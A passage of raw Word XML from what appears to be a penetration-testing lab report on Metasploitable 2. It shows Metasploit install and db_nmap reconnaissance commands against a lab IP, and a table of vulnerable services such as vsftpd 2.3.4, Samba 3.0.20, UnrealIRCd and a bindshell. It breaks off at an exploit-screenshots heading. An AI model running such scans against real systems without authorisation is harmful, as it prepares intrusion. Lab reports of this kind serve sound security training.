        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install -y metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole -v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="4A7C59"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"># Output: Framework Version: 6.3.44-dev</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="default"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Database: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="default"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Workspaces: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="default"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Reconnaissance — db_nmap Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment begins with a service version scan stored directly in the Metasploit database, making results queryable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; db_nmap -sV -O --open 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; hosts       # List discovered hosts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; services    # List all open services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">msf6 &gt; vulns       # Show identified vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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800"/>
        <w:gridCol w:w="2800"/>
        <w:gridCol w:w="1800"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="2C3E5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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:shd w:fill="2C3E5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State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2C3E5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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>
            <w:shd w:fill="2C3E5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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2C3E5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Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="922B21"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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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OpenSSH 4.7p1 Debian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="E67E22"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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C0392B"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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Apache httpd 2.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C0392B"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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Samba smbd 3.0.20-Debian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="922B21"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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">1524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Bindshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Metasploitable root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="922B21"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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C0392B"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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">5900</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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VNC (protocol 3.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="C0392B"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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">6667</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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IRC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="922B21"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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2: db_nmap scan results — key vulnerable services on Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Metasploit Console — Scan &amp; Exploit Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5286375" cy="3305175"/>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86375" cy="3305175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
